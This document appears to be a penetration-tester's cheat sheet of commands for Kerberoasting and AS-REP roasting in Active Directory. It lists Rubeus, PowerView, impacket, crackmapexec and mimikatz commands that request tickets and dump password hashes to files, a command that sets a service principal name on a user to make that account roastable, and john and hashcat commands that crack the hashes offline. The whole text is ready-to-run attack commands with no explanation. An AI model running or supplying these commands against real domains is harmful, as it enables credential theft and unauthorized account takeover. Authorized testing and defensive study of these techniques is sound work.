Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
#Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
#From memory to disk
kerberos::list /export
john --wordlist=<wordlist path> hashes.txt
hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
#ASREPRoast.ps1
Get-ASREPHash -UserName <USER> -Verbose
Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
#with Creds
impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
#with users
impacket-GetNPUsers -request -dc-ip IP -usersfile users .txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
john --wordlist=<wordlist path> hashes.txt
hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>